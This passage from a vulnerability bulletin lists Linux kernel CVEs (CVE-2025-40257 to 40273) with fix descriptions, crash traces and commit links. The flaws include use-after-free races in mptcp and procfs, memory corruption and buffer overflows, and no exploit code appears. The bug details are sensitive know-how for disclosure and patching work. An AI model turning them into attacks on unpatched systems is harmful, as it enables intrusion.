mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> Allocated by task 44: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748 kmalloc_noprof include/linux/slab.h:957 [inline] mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385 mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355 mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline] __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529 mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Freed by task 6630: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object m ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40257 | https://git.kernel.org/stable/c/9be29f8e7ce4e147e56caac2c3a0ce3573cf9c17 https://git.kernel.org/stable/c/e2d1ad207174a7cd7903dd27a00db4b2dfa6c64b https://git.kernel.org/stable/c/385ddc0f008f24d1e7d03be998b3a98a37bd29ff https://git.kernel.org/stable/c/c602cc344b4b8d41515fec3ffa98457ac963ee12 https://git.kernel.org/stable/c/6d3275d4ca62e2c02e1b7e8cd32db59df91c14b7 https://git.kernel.org/stable/c/bbbd75346c8e6490b19c2ba90f38ea66ccf352b2 https://git.kernel.org/stable/c/426358d9be7ce3518966422f87b96f1bad27295f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix race condition in mptcp_schedule_work() syzbot reported use-after-free in mptcp_schedule_work() [1] Issue here is that mptcp_schedule_work() schedules a work, then gets a refcount on sk->sk_refcnt if the work was scheduled. This refcount will be released by mptcp_worker(). [A] if (schedule_work(...)) { [B] sock_hold(sk); return true; } Problem is that mptcp_worker() can run immediately and complete before [B] We need instead : sock_hold(sk); if (schedule_work(...)) return true; sock_put(sk); [1] refcount_t: addition on 0; use-after-free. WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25 Call Trace: <TASK> __refcount_add include/linux/refcount.h:-1 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] sock_hold include/net/sock.h:816 [inline] mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943 mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316 call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747 expire_timers kernel/time/timer.c:1798 [inline] __run_timers kernel/time/timer.c:2372 [inline] __run_timer_base+0x648/0x970 kernel/time/timer.c:2384 run_timer_base kernel/time/timer.c:2393 [inline] run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] run_ktimerd+0xcf/0x190 kernel/softirq.c:1138 smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 | 2025-12-04 | not yet calculated | CVE-2025-40258 | https://git.kernel.org/stable/c/f865e6595acf33083168db76921e66ace8bf0e5b https://git.kernel.org/stable/c/99908e2d601236842d705d5fd04fb349577316f5 https://git.kernel.org/stable/c/db4f7968a75250ca6c4ed70d0a78beabb2dcee18 https://git.kernel.org/stable/c/8f9ba1a99a89feef9b5867c15a0141a97e893309 https://git.kernel.org/stable/c/ac28dfddedf6f209190950fc71bcff65ec4ab47b https://git.kernel.org/stable/c/3fc7723ed01d1130d4bf7063c50e0af60ecccbb4 https://git.kernel.org/stable/c/035bca3f017ee9dea3a5a756e77a6f7138cc6eea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: sg: Do not sleep in atomic context sg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may sleep. Hence, call sg_finish_rem_req() with interrupts enabled instead of disabled. | 2025-12-04 | not yet calculated | CVE-2025-40259 | https://git.kernel.org/stable/c/11eeee00c94d770d4e45364060b5f1526dfe567b https://git.kernel.org/stable/c/db6ac8703ab2b473e1ec845f57f6dd961a388d9f https://git.kernel.org/stable/c/109afbd88ecc46b6cc7551367222387e97999765 https://git.kernel.org/stable/c/3dfd520c3b4ffe69e0630c580717d40447ab842f https://git.kernel.org/stable/c/b343cee5df7e750d9033fba33e96fc4399fa88a5 https://git.kernel.org/stable/c/b2c0340cfa25c5c1f65e8590cc1a2dc97d14ef0f https://git.kernel.org/stable/c/6983d8375c040bb449d2187f4a57a20de01244fe https://git.kernel.org/stable/c/90449f2d1e1f020835cba5417234636937dd657e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix scx_enable() crash on helper kthread creation failure A crash was observed when the sched_ext selftests runner was terminated with Ctrl+\ while test 15 was running: NIP [c00000000028fa58] scx_enable.constprop.0+0x358/0x12b0 LR [c00000000028fa2c] scx_enable.constprop.0+0x32c/0x12b0 Call Trace: scx_enable.constprop.0+0x32c/0x12b0 (unreliable) bpf_struct_ops_link_create+0x18c/0x22c __sys_bpf+0x23f8/0x3044 sys_bpf+0x2c/0x6c system_call_exception+0x124/0x320 system_call_vectored_common+0x15c/0x2ec kthread_run_worker() returns an ERR_PTR() on failure rather than NULL, but the current code in scx_alloc_and_add_sched() only checks for a NULL helper. In case of failure on SIGQUIT, the error is not handled in scx_alloc_and_add_sched() and scx_enable() ends up dereferencing an error pointer. Error handling is fixed in scx_alloc_and_add_sched() to propagate PTR_ERR() into ret, so that scx_enable() jumps to the existing error path, avoiding random dereference on failure. | 2025-12-04 | not yet calculated | CVE-2025-40260 | https://git.kernel.org/stable/c/625e173e2a59b6cf6cbfb51c0a6bea47f3861eab https://git.kernel.org/stable/c/7b6216baae751369195fa3c83d434d23bcda406a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() nvme_fc_delete_association() waits for pending I/O to complete before returning, and an error can cause ->ioerr_work to be queued after cancel_work_sync() had been called. Move the call to cancel_work_sync() to be after nvme_fc_delete_association() to ensure ->ioerr_work is not running when the nvme_fc_ctrl object is freed. Otherwise the following can occur: [ 1135.911754] list_del corruption, ff2d24c8093f31f8->next is NULL [ 1135.917705] ------------[ cut here ]------------ [ 1135.922336] kernel BUG at lib/list_debug.c:52! [ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary) [ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025 [ 1135.950969] Workqueue: 0x0 (nvme-wq) [ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f [ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff <0f> 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b [ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046 [ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000 [ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0 [ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08 [ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100 [ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0 [ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000 [ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0 [ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 1136.055910] PKRU: 55555554 [ 1136.058623] Call Trace: [ 1136.061074] <TASK> [ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.071898] ? move_linked_works+0x4a/0xa0 [ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.081744] ? __die_body.cold+0x8/0x12 [ 1136.085584] ? die+0x2e/0x50 [ 1136.088469] ? do_trap+0xca/0x110 [ 1136.091789] ? do_error_trap+0x65/0x80 [ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.101289] ? exc_invalid_op+0x50/0x70 [ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20 [ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.120806] move_linked_works+0x4a/0xa0 [ 1136.124733] worker_thread+0x216/0x3a0 [ 1136.128485] ? __pfx_worker_thread+0x10/0x10 [ 1136.132758] kthread+0xfa/0x240 [ 1136.135904] ? __pfx_kthread+0x10/0x10 [ 1136.139657] ret_from_fork+0x31/0x50 [ 1136.143236] ? __pfx_kthread+0x10/0x10 [ 1136.146988] ret_from_fork_asm+0x1a/0x30 [ 1136.150915] </TASK> | 2025-12-04 | not yet calculated | CVE-2025-40261 | https://git.kernel.org/stable/c/3d78e8e01251da032a5f7cbc9728e4ab1a5a5464 https://git.kernel.org/stable/c/60ba31330faf5677e2eebef7eac62ea9e42a200d https://git.kernel.org/stable/c/3d81beae4753db3b3dc5b70dc300d4036e0d9cb8 https://git.kernel.org/stable/c/33f64600a12055219bda38b55320c62cdeda9167 https://git.kernel.org/stable/c/48ae433c6cc6985f647b1b37d8bb002972cf9bdb https://git.kernel.org/stable/c/fbd5741a556eaaa63d0908132ca79d335b58b1cd https://git.kernel.org/stable/c/0a2c5495b6d1ecb0fa18ef6631450f391a888256 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: imx_sc_key - fix memory corruption on unload This is supposed to be "priv" but we accidentally pass "&priv" which is an address in the stack and so it will lead to memory corruption when the imx_sc_key_action() function is called. Remove the &. | 2025-12-04 | not yet calculated | CVE-2025-40262 | https://git.kernel.org/stable/c/3e96803b169dc948847f0fc2bae729a80914eb7b https://git.kernel.org/stable/c/4ce5218b101205b3425099fe3df88a61b58f9cc2 https://git.kernel.org/stable/c/a155292c3ce722036014da5477ee0e4c87b5e6b3 https://git.kernel.org/stable/c/ca9a08de9b294422376f47ade323d69590dbc6f2 https://git.kernel.org/stable/c/56881294915a6e866d31a46f9bcb5e19167cfbaa https://git.kernel.org/stable/c/6524a15d33951b18ac408ebbcb9c16e14e21c336 https://git.kernel.org/stable/c/d83f1512758f4ef6fc5e83219fe7eeeb6b428ea4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: cros_ec_keyb - fix an invalid memory access If cros_ec_keyb_register_matrix() isn't called (due to `buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev->idev` remains NULL. An invalid memory access is observed in cros_ec_keyb_process() when receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work() in such case. Unable to handle kernel read from unreadable memory at virtual address 0000000000000028 ... x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: input_event cros_ec_keyb_work blocking_notifier_call_chain ec_irq_thread It's still unknown why the kernel receives such a malformed event; in any case, the kernel shouldn't access `ckdev->idev` and friends if the driver doesn't intend to initialize them. | 2025-12-04 | not yet calculated | CVE-2025-40263 | https://git.kernel.org/stable/c/7bfd959187f2c7584bb43280bbc7b2846e7a5085 https://git.kernel.org/stable/c/8b5ae1521660c16fa830ff17d16e650b4905b71a https://git.kernel.org/stable/c/729d21c82c1b0504ffccb17cc261bf32e024fd0f https://git.kernel.org/stable/c/d74864291cb8bd784d44d1d02e87109cf88666bb https://git.kernel.org/stable/c/9cf59f4724a9ee06ebb06c76b8678ac322e850b7 https://git.kernel.org/stable/c/6d81068685154535af06163eb585d6d9663ec7ec https://git.kernel.org/stable/c/2d251c15c27e2dd16d6318425d2f7260cbd47d39 https://git.kernel.org/stable/c/e08969c4d65ac31297fcb4d31d4808c789152f68 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: be2net: pass wrb_params in case of OS2BMC be_insert_vlan_in_pkt() is called with the wrb_params argument being NULL at be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL pointer when processing a workaround for specific packet, as commit bc0c3405abbb ("be2net: fix a Tx stall bug caused by a specific ipv6 packet") states. The correct way would be to pass the wrb_params from be_xmit(). | 2025-12-04 | not yet calculated | CVE-2025-40264 | https://git.kernel.org/stable/c/48d59b60dd5d7e4c48c077a2008c9dcd7b59bdfe https://git.kernel.org/stable/c/f499dfa5c98e92e72dd454eb95a1000a448f3405 https://git.kernel.org/stable/c/630360c6724e27f1aa494ba3fffe1e38c4205284 https://git.kernel.org/stable/c/012ee5882b1830db469194466a210768ed207388 https://git.kernel.org/stable/c/ce0a3699244aca3acb659f143c9cb1327b210f89 https://git.kernel.org/stable/c/1ecd86ec6efddb59a10c927e8e679f183bb9113e https://git.kernel.org/stable/c/4c4741f6e7f2fa4e1486cb61e1c15b9236ec134d https://git.kernel.org/stable/c/7d277a7a58578dd62fd546ddaef459ec24ccae36 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfat: fix missing sb_min_blocksize() return value checks When emulating an nvme device on qemu with both logical_block_size and physical_block_size set to 8 KiB, but without format, a kernel panic was triggered during the early boot stage while attempting to mount a vfat filesystem. [95553.682035] EXT4-fs (nvme0n1): unable to set blocksize [95553.684326] EXT4-fs (nvme0n1): unable to set blocksize [95553.686501] EXT4-fs (nvme0n1): unable to set blocksize [95553.696448] ISOFS: unsupported/invalid hardware sector size 8192 [95553.697117] ------------[ cut here ]------------ [95553.697567] kernel BUG at fs/buffer.c:1582! [95553.697984] Oops: invalid opcode: 0000 [#1] SMP NOPTI [95553.698602] CPU: 0 UID: 0 PID: 7212 Comm: mount Kdump: loaded Not tainted 6.18.0-rc2+ #38 PREEMPT(voluntary) [95553.699511] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [95553.700534] RIP: 0010:folio_alloc_buffers+0x1bb/0x1c0 [95553.701018] Code: 48 8b 15 e8 93 18 02 65 48 89 35 e0 93 18 02 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d 31 d2 31 c9 31 f6 31 ff c3 cc cc cc cc <0f> 0b 90 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f [95553.702648] RSP: 0018:ffffd1b0c676f990 EFLAGS: 00010246 [95553.703132] RAX: ffff8cfc4176d820 RBX: 0000000000508c48 RCX: 0000000000000001 [95553.703805] RDX: 0000000000002000 RSI: 0000000000000000 RDI: 0000000000000000 [95553.704481] RBP: ffffd1b0c676f9c8 R08: 0000000000000000 R09: 0000000000000000 [95553.705148] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000001 [95553.705816] R13: 0000000000002000 R14: fffff8bc8257e800 R15: 0000000000000000 [95553.706483] FS: 000072ee77315840(0000) GS:ffff8cfdd2c8d000(0000) knlGS:0000000000000000 [95553.707248] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [95553.707782] CR2: 00007d8f2a9e5a20 CR3: 0000000039d0c006 CR4: 0000000000772ef0 [95553.708439] PKRU: 55555554 [95553.708734] Call Trace: [95553.709015] <TASK> [95553.709266] __getblk_slow+0xd2/0x230 [95553.709641] ? find_get_block_common+0x8b/0x530 [95553.710084] bdev_getblk+0x77/0xa0 [95553.710449] __bread_gfp+0x22/0x140 [95553.710810] fat_fill_super+0x23a/0xfc0 [95553.711216] ? __pfx_setup+0x10/0x10 [95553.711580] ? __pfx_vfat_fill_super+0x10/0x10 [95553.712014] vfat_fill_super+0x15/0x30 [95553.712401] get_tree_bdev_flags+0x141/0x1e0 [95553.712817] get_tree_bdev+0x10/0x20 [95553.713177] vfat_get_tree+0x15/0x20 [95553.713550] vfs_get_tree+0x2a/0x100 [95553.713910] vfs_cmd_create+0x62/0xf0 [95553.714273] __do_sys_fsconfig+0x4e7/0x660 [95553.714669] __x64_sys_fsconfig+0x20/0x40 [95553.715062] x64_sys_call+0x21ee/0x26a0 [95553.715453] do_syscall_64+0x80/0x670 [95553.715816] ? __fs_parse+0x65/0x1e0 [95553.716172] ? fat_parse_param+0x103/0x4b0 [95553.716587] ? vfs_parse_fs_param_source+0x21/0xa0 [95553.717034] ? __do_sys_fsconfig+0x3d9/0x660 [95553.717548] ? __x64_sys_fsconfig+0x20/0x40 [95553.717957] ? x64_sys_call+0x21ee/0x26a0 [95553.718360] ? do_syscall_64+0xb8/0x670 [95553.718734] ? __x64_sys_fsconfig+0x20/0x40 [95553.719141] ? x64_sys_call+0x21ee/0x26a0 [95553.719545] ? do_syscall_64+0xb8/0x670 [95553.719922] ? x64_sys_call+0x1405/0x26a0 [95553.720317] ? do_syscall_64+0xb8/0x670 [95553.720702] ? __x64_sys_close+0x3e/0x90 [95553.721080] ? x64_sys_call+0x1b5e/0x26a0 [95553.721478] ? do_syscall_64+0xb8/0x670 [95553.721841] ? irqentry_exit+0x43/0x50 [95553.722211] ? exc_page_fault+0x90/0x1b0 [95553.722681] entry_SYSCALL_64_after_hwframe+0x76/0x7e [95553.723166] RIP: 0033:0x72ee774f3afe [95553.723562] Code: 73 01 c3 48 8b 0d 0a 33 0f 00 f7 d8 64 89 01 48 83 c8 ff c3 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 49 89 ca b8 af 01 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d da 32 0f 00 f7 d8 64 89 01 48 [95553.725188] RSP: 002b:00007ffe97148978 EFLAGS: 00000246 ORIG_RAX: 00000000000001af [95553.725892] RAX: ffffffffffffffda RBX: ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40265 | https://git.kernel.org/stable/c/ee767b99b0045be286cceb8265bd4c9831be671e https://git.kernel.org/stable/c/63b5aa01da0f38cdbd97d021477258e511631497 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Check the untrusted offset in FF-A memory share Verify the offset to prevent OOB access in the hypervisor FF-A buffer in case an untrusted large enough value [U32_MAX - sizeof(struct ffa_composite_mem_region) + 1, U32_MAX] is set from the host kernel. | 2025-12-04 | not yet calculated | CVE-2025-40266 | https://git.kernel.org/stable/c/fc3139d9f4c1fe1c7d5f25f99676bd8e9c6a1041 https://git.kernel.org/stable/c/bc1909ef38788f2ee3d8011d70bf029948433051 https://git.kernel.org/stable/c/f9f1aed6c8a3427900da3121e1868124854569c3 https://git.kernel.org/stable/c/103e17aac09cdd358133f9e00998b75d6c1f1518 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/rw: ensure allocated iovec gets cleared for early failure A previous commit reused the recycling infrastructure for early cleanup, but this is not enough for the case where our internal caches have overflowed. If this happens, then the allocated iovec can get leaked if the request is also aborted early. Reinstate the previous forced free of the iovec for that situation. | 2025-12-06 | not yet calculated | CVE-2025-40267 | https://git.kernel.org/stable/c/094c6467fe05e0de618c5a7fcff4d3ee20aeaef8 https://git.kernel.org/stable/c/d3c9c213c0b86ac5dd8fe2c53c24db20f1f510bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: client: fix memory leak in smb3_fs_context_parse_param The user calls fsconfig twice, but when the program exits, free() only frees ctx->source for the second fsconfig, not the first. Regarding fc->source, there is no code in the fs context related to its memory reclamation. To fix this memory leak, release the source memory corresponding to ctx or fc before each parsing. syzbot reported: BUG: memory leak unreferenced object 0xffff888128afa360 (size 96): backtrace (crc 79c9c7ba): kstrdup+0x3c/0x80 mm/util.c:84 smb3_fs_context_parse_param+0x229b/0x36c0 fs/smb/client/fs_context.c:1444 BUG: memory leak unreferenced object 0xffff888112c7d900 (size 96): backtrace (crc 79c9c7ba): smb3_fs_context_fullpath+0x70/0x1b0 fs/smb/client/fs_context.c:629 smb3_fs_context_parse_param+0x2266/0x36c0 fs/smb/client/fs_context.c:1438 | 2025-12-06 | not yet calculated | CVE-2025-40268 | https://git.kernel.org/stable/c/868fc62811d3fabcf5685e14f36377a855d5412d https://git.kernel.org/stable/c/48c17341577e25a22feb13d694374b61d974edbc https://git.kernel.org/stable/c/4515743cc7a42e1d67468402a6420c195532a6fa https://git.kernel.org/stable/c/e8c73eb7db0a498cd4b22d2819e6ab1a6f506bd6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix potential overflow of PCM transfer buffer The PCM stream data in USB-audio driver is transferred over USB URB packet buffers, and each packet size is determined dynamically. The packet sizes are limited by some factors such as wMaxPacketSize USB descriptor. OTOH, in the current code, the actually used packet sizes are determined only by the rate and the PPS, which may be bigger than the size limit above. This results in a buffer overflow, as reported by syzbot. Basically when the limit is smaller than the calculated packet size, it implies that something is wrong, most likely a weird USB descriptor. So the best option would be just to return an error at the parameter setup time before doing any further operations. This patch introduces such a sanity check, and returns -EINVAL when the packet size is greater than maxpacksize. The comparison with ep->packsize[1] alone should suffice since it's always equal or greater than ep->packsize[0]. | 2025-12-06 | not yet calculated | CVE-2025-40269 | https://git.kernel.org/stable/c/6a5da3fa80affc948923f20a4e086177f505e86e https://git.kernel.org/stable/c/217d47255a2ec8b246f2725f5db9ac3f1d4109d7 https://git.kernel.org/stable/c/ef592bf2232a2daa9fffa8881881fc9957ea56e9 https://git.kernel.org/stable/c/ece3b981bb6620e47fac826a2156c090b1a936a0 https://git.kernel.org/stable/c/98e9d5e33bda8db875cc1a4fe99c192658e45ab6 https://git.kernel.org/stable/c/d2c04f20ccc6c0d219e6d3038bab45bc66a178ad https://git.kernel.org/stable/c/05a1fc5efdd8560f34a3af39c9cf1e1526cc3ddf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm, swap: fix potential UAF issue for VMA readahead Since commit 78524b05f1a3 ("mm, swap: avoid redundant swap device pinning"), the common helper for allocating and preparing a folio in the swap cache layer no longer tries to get a swap device reference internally, because all callers of __read_swap_cache_async are already holding a swap entry reference. The repeated swap device pinning isn't needed on the same swap device. Caller of VMA readahead is also holding a reference to the target entry's swap device, but VMA readahead walks the page table, so it might encounter swap entries from other devices, and call __read_swap_cache_async on another device without holding a reference to it. So it is possible to cause a UAF when swapoff of device A raced with swapin on device B, and VMA readahead tries to read swap entries from device A. It's not easy to trigger, but in theory, it could cause real issues. Make VMA readahead try to get the device reference first if the swap device is a different one from the target entry. | 2025-12-06 | not yet calculated | CVE-2025-40270 | https://git.kernel.org/stable/c/a4145be7b56bfa87dce56415c3ad993071462b8a https://git.kernel.org/stable/c/1c2a936edd71e133f2806e68324ec81a4eb07588 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix uaf in proc_readdir_de() Pde is erased from subdir rbtree through rb_erase(), but not set the node to EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE() set the erased node to EMPTY, then pde_subdir_next() will return NULL to avoid uaf access. We found an uaf issue while using stress-ng testing, need to run testcase getdent and tun in the same time. The steps of the issue is as follows: 1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current pde is tun3; 2) in the [time windows] unregister netdevice tun3 and tun2, and erase them from rbtree. erase tun3 first, and then erase tun2. the pde(tun2) will be released to slab; 3) continue to getdent process, then pde_subdir_next() will return pde(tun2) which is released, it will case uaf access. CPU 0 | CPU 1 ------------------------------------------------------------------------- traverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun->dev) //tun3 tun2 sys_getdents64() | iterate_dir() | proc_readdir() | proc_readdir_de() | snmp6_unregister_dev() pde_get(de); | proc_remove() read_unlock(&proc_subdir_lock); | remove_proc_subtree() | write_lock(&proc_subdir_lock); [time window] | rb_erase(&root->subdir_node, &parent->subdir); | write_unlock(&proc_subdir_lock); read_lock(&proc_subdir_lock); | next = pde_subdir_next(de); | pde_put(de); | de = next; //UAF | rbtree of dev_snmp6 | pde(tun3) / \ NULL pde(tun2) | 2025-12-06 | not yet calculated | CVE-2025-40271 | https://git.kernel.org/stable/c/1d1596d68a6f11d28f677eedf6cf5b17dbfeb491 https://git.kernel.org/stable/c/c81d0385500446efe48c305bbb83d47f2ae23a50 https://git.kernel.org/stable/c/4cba73c4c89219beef7685a47374bf88b1022369 https://git.kernel.org/stable/c/6f2482745e510ae1dacc9b090194b9c5f918d774 https://git.kernel.org/stable/c/67272c11f379d9aa5e0f6b16286b9d89b3f76046 https://git.kernel.org/stable/c/623bb26127fb581a741e880e1e1a47d79aecb6f8 https://git.kernel.org/stable/c/03de7ff197a3d0e17d0d5c58fdac99a63cba8110 https://git.kernel.org/stable/c/895b4c0c79b092d732544011c3cecaf7322c36a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/secretmem: fix use-after-free race in fault handler When a page fault occurs in a secret memory file created with `memfd_secret(2)`, the kernel will allocate a new folio for it, mark the underlying page as not-present in the direct map, and add it to the file mapping. If two tasks cause a fault in the same page concurrently, both could end up allocating a folio and removing the page from the direct map, but only one would succeed in adding the folio to the file mapping. The task that failed undoes the effects of its attempt by (a) freeing the folio again and (b) putting the page back into the direct map. However, by doing these two operations in this order, the page becomes available to the allocator again before it is placed back in the direct mapping. If another task attempts to allocate the page between (a) and (b), and the kernel tries to access it via the direct map, it would result in a supervisor not-present page fault. Fix the ordering to restore the direct map before the folio is freed. | 2025-12-06 | not yet calculated | CVE-2025-40272 | https://git.kernel.org/stable/c/bb1c19636aedae39360e6fdbcaef4f2bcff25785 https://git.kernel.org/stable/c/1e4643d6628edf9c0047b1f8f5bc574665025acb https://git.kernel.org/stable/c/42d486d35a4143cc37fc72ee66edc99d942dd367 https://git.kernel.org/stable/c/52f2d5cf33de9a8f5e72bbb0ed38282ae0bc4649 https://git.kernel.org/stable/c/4444767e625da46009fc94a453fd1967b80ba047 https://git.kernel.org/stable/c/6f86d0534fddfbd08687fa0f01479d4226bc3c3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: free copynotify stateid in nfs4_free_ol_stateid() Typically copynotify stateid is freed either when parent's stateid is being closed/freed or in nfsd4_laundromat if the stateid hasn't been used in a lease period. However, in the case when the server got an OPEN (which created a parent stateid), followed by a COPY_NOTIFY using that stateid, followed by a client reboot. New client instance while doing CREATE_SESSION would force expire previous state of this client. It leads to the open state being freed through release_openowner-> nfs4_free_ol_stateid() and it finds that it still has copynotify stateid associated with it. We currently print a warning, and it is triggered: WARNING: CPU: 1 PID: 8858 at fs/nfsd/nfs4state.c:1550 nfs4_free_ol_stateid+0xb0/0x100 [nfsd] This patch, instead, frees the associated copynotify stateid here. If the parent stateid is freed (without freeing the copynotify stateids associated with it), it leads to list corruption when laundromat ends up freeing the copynotify state later. [ 1626.839430] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP [ 1626.842828] Modules linked in: nfnetlink_queue nfnetlink_log bluetooth cfg80211 rpcrdma rdma_cm iw_cm ib_cm ib_core nfsd nfs_acl lockd grace nfs_localio ext4 crc16 mbcache jbd2 overlay uinput snd_seq_dummy snd_hrtimer qrtr rfkill vfat fat uvcvideo snd_hda_codec_generic videobuf2_vmalloc videobuf2_memops snd_hda_intel uvc snd_intel_dspcfg videobuf2_v4l2 videobuf2_common snd_hda_codec snd_hda_core videodev snd_hwdep snd_seq mc snd_seq_device snd_pcm snd_timer snd soundcore sg loop auth_rpcgss vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vmw_vmci vsock xfs 8021q garp stp llc mrp nvme ghash_ce e1000e nvme_core sr_mod nvme_keyring nvme_auth cdrom vmwgfx drm_ttm_helper ttm sunrpc dm_mirror dm_region_hash dm_log iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse dm_multipath dm_mod nfnetlink [ 1626.855594] CPU: 2 UID: 0 PID: 199 Comm: 